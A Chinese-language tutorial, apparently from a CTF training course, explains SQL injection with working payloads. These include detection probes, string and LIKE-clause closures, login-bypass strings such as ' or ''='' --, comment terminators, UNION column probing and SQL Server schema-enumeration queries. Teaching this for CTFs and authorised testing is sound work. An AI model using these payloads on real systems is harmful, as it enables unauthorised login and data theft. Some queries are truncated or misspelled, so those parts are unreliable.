是我们的第二个实战课程
我们还是那句话先 重要声明 该培训中提及的技术只适用于合法CTF比赛和有合法授权的渗透测试,请勿用于其他非法用途,如用作其他非法用途与本文作者无关
SQL注入漏洞产生的原因
SQL注入(SQL Injection)
是程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作
那什么是SQL呢
SQL语句
SQL(Structured Query Language)
结构化的查询语言,是关系型数据库通讯的标准语言。
查询:SELECT statement FROM table WHERE condition
删除记录:DELETE FROM table WHERE condition
更新记录:UPDATE table SET field=value WHERE condtion
添加记录:INSERT INTO table field VALUES(values)
SQL注入攻击流程
一般可以分为这么几个步骤:
那如何判断一个SQL注入点呢
判断注入点
最简单的方法,引入单引号
http://host/test.php?id=100’ 返回错误说明有可能注入
http://host/test.php?id=100 and 1=1 返回正常
http://host/test.php?id=100 and 1=2 返回错误
如果满足上面三点,是注入点的可能性就很高了
找到注入点之后就是判断注入类型
数字型注入点
测试方法:
http://host/test.php?id=100 and 1=1 返回成功
http://host/test.php?id=100 and 1=2 返回失败
为什么第一个会返回成功,而第二个是返回失败呢?
原因如下:
假设我们网站的SQL查询的语句是这样的
SELECT * FROM news WHERE id=$id
这里的$id是用户提交的
当我们输入的是
100 and 1=1
语句就变成了这样
SELECT * FROM news WHERE id=100 and 1=1
这个SQL语句and左边是返回成功的,因为我们是在有这个id的情况下后面加上我们的注入语句,如果这个id不存在,那就没法测试了
而在and右边,1=1也是恒成立的,所以整个语句返回的是成功
当然,如果后面改成了1=2的话,因为1=2是不成立的,and语句的判断逻辑是只要有一个不成立,就返回失败,所以1=2最后会返回的是失败
字符型注入点
测试方法:
http://host/test.php?name=man' and '1'='1 返回成功
http://host/test.php?name=man' and '1'='2 返回失败
这里看上去就和上面的数字型就多了个单引号,其实不仅仅如此
原因如下:
还是假设我们网站的SQL语句是这样的
SELECT * FROM news WHERE name='$name'
当我们构造输入为下面这个的时候
man' and '1'='1
语句就变成了
SELECT * FROM news WHERE name='man' and '1'='1'
发现什么了没?这个SQL已经闭合了
还是一样的,这里and的左边是一定成立的,而and右边也是一样的成立,所以and逻辑之后,整个语句返回成功
同理可知如果后面是1'='2就会返回失败,当然,这里不一定非要是1或者2,因为是字符型,所以我们可以输入任何字符
比如这样
http://host/test.php?name=man' and 'a'='a 返回成功
http://host/test.php?name=man' and 'a'='b 返回失败
索型注入点
测试方法
http://host//test.php?keyword=python%' and 1=1 and '%'='
http://host//test.php?keyword=python%' and 1=2 and '%'='
假设我们的SQL查询语句是这样的
SELECT * FROM news WHERE keyword like '%$keyword%'
这里的$keyword是用户的输入
当我们输入以下语句的时候
python%' and 1=1 and '%'='
最终我们得到的语句是这样的
SELECT * FROM news WHERE keyword like '%python%' and 1=1 and '%'='%'
发现了什么没有?
这个语句又一次的闭合了
这里我们再分析以下,因为是and逻辑,只要有一个错误,就返回错误
我们可以把这个语句分为三段
SELECT * FROM news WHERE keyword like '%python%'
and 1=1
and '%'='%'
第一行的语句肯定是成功(再强调一遍,我们要在存在的查询上构造SQL注入)
第二句也是,第三句也是,因为自己肯定等于自己啊
但是如果我们把第二句换成1=2,那么这个语句肯定就会返回失败了,就是这个原理
内联式SQL注入
内联注入是指查询注入SQL代码后,原来的查询仍然全部执行
假设我们的网站SQL查询语句是这样的
SELECT * FROM admin WHER username='$name' AND password ='$passwd'
这一看就是个登录页面的代码
假如我们构造如下语句提交到登录框中的username
' or ''='
或者提交到password框里面,这两种提交方法是不一样的,我们下面就来分析一下这两个提交方法
提交到username我们的语句就会成为这样
SELECT * FROM admin WHER username='' or ''='' AND password ='fuzz'
fuzz是我们随便输入的字符串
而提交到password则会是这样的
SELECT * FROM admin WHER username='fuzz' AND password ='' or ''=''
这里我们要知道一点,就是在SQL语句中,AND的优先级是大于OR的,于是会先计算AND,然后之后才会计算OR,所以这里我们的语句会被OR分为两段SQL语句
这是username框的
SELECT * FROM admin WHER username=''
or
''='' AND password ='fuzz'
或者password框的是这样
SELECT * FROM admin WHER username='fuzz' AND password =''
or
''=''
我们首先用第一个来分析
首先计算AND之后
SELECT * FROM admin WHER username='' 返回失败
or
''='' AND password ='fuzz' 返回失败
数据库是不会存在username为NULL的字段的,所以第一句返回的是失败,第三句中,因为password是我们随便输入的,99.99%是不会存在这个密码的,于是AND之后,我们的第三句也是失败的,所以整个语句返回失败的
但是我们的password情况就不一样了
SELECT * FROM admin WHER username='fuzz' AND password =''
or
''=''
这里我们第一句是返回失败的,但是我们的第二句''=''是返回成功的,OR逻辑是有一个是成功就返回成功,于是我们的整个语句就会返回成功
返回成功之后我们就会绕过登录表单直接登录系统了
终止式SQL注入
终止式SQL语句注入是指攻击者在注入SQL代码时,通过注释剩下的查询来成功结束该语句
于是被注释的查询不会被执行,我们还是拿上面那个例子举例
我们上面已经知道,在username框内填入
' or ''='
程序是不会返回成功的,我们就没有办法在username做文章了吗?
错了,我们还有终止式
还是上面那个SQL查询语句
SELECT * FROM admin WHER username='$name' AND password ='$passwd'
这里我们构造如下username输入
' or ''='' --
之后我们就可以得到如下的查询语句
SELECT * FROM admin WHER username='' or ''='' --' AND password ='fuzz'
这里的fuzz是我们随便输入的,-是注释符
这样,我们的语句就可以分为三个部分了
SELECT * FROM admin WHER username=''
or ''='' 返回成功
--' AND password ='fuzz'
第一句肯定是返回失败的,但是我们第二句会返回成功,那你可能会问,那后面的语句了?
已经被我们注释掉了,是不会执行的,所以我们还是可以通过在username做这个手脚来绕过登录
下面是我们常见的一些终止方式
终止字符串:
-- , #, %23, %00, /*
终止方法:
-- , ‘-- , ‘)-- , ) -- , ‘)) --, ))--
注入点可能在哪里?
所有的输入只要和数据库进行交互的,都有可能触发SQL注入
常见的包括
Get参数触发SQL注入
POST参数触发SQL注入
Cookie触发SQL注入
没错,Cookie也是可以的
参与SQL执行的输入都有可能进行SQL注入
下面我们来了解一下一般网站的常用架构是什么样的
常见网站架构
我们可以通过常见构架来判断数据库的类型
asp + access
asp + mssql
asp.net + mssql
php + mysql
Jsp + oracle
Jsp + mysql
如果你发现了一个网站是用php的,那这个网站的数据库很有可能就是MySQL
当然我们也可以在单引号报错里面知道是什么数据库
识别数据库我们就简单的介绍到这里,下面我们来了解一下常用的注入方法
UNION是数据库管理员经常使用且可以掌控的运算符之一
可以使用它连接两条或多条SELECT语句的查询结果
其基本语法如下:
SELECT colum1,colum2,colum3,…,columN FROM table1
UNION
SELECT colum1,colum2,colum3,…,columN FROM table2
如果应用返回第一个(原始)查询得到的数据,那么通过在第一个查询后注入一个UNION运算符,并添加另一个任意查询,便可读取到数据库用户有权限访问的任何一张表
当然这么好用的语句是有限制的
使用UNION获取数据规则:
UNION语句的构建
确定列数量:
UNION SELECT null,null,null,…,null FROM dual
使用逐步增加null数量,直到匹配原语句的列数量,成功匹配后返回正常页面
这是利用了<两个查询返回的列数必须相同>这个原理
使用ORDER BY确定原语句列数量, 可使用折半查找法提高猜测效率
当我们确定了表中列的数量之后,怎么确定类型?
确定列类型:
UNION SELECT 1,’2’,null,…,null FROM dual
我们这里先猜测第一列为数字,如果返回结果不正确,则判断为字符
如果还是不正确则保持null不变(可能为二进制类型),之后依次完成部分或全部类型的判断
当然,每种方式都有不适用的情况
Union不适用的地方
注入语句无法截断,且不清楚完整的SQL查询语句
Web页面中有两个SQL查询语句,查询语句的列数不同
最后我们来讲一下枚举数据库
SQL Server
获取当前用户名
id=12 UNION SELECT null, null, user, null FROM master..sysdatabases
获取数据库列表
id=12 UNION SELECT null, null, name,null FROM master..sysdatabases
获取当前数据库名
id =12 UNION SELECT null,null,db_name(),null FROM master..sysdatabases
获取表名
id=12 UNION SELECT null,null,name,null FROM sysobjects where xtype=‘u’
获取字段名
id =12 UNION SELECT null,null,col_name(object_id(‘table_name’), 1), null FROM sysobjects
获取当前用户
SELECT database()
获取表名
获取字段名
SELECT some_columns FROM information_schema.columns WHERE table_name='some_name'
Oracle
Oracle只能访问一个数据库,所以无法枚举数据库
获取当前用户表名
今天我们的课程就上到这里,靶机中会用到我们上面几种注入方法的其中一种~
建议大家不要sqlmap还是自己手动注入看看~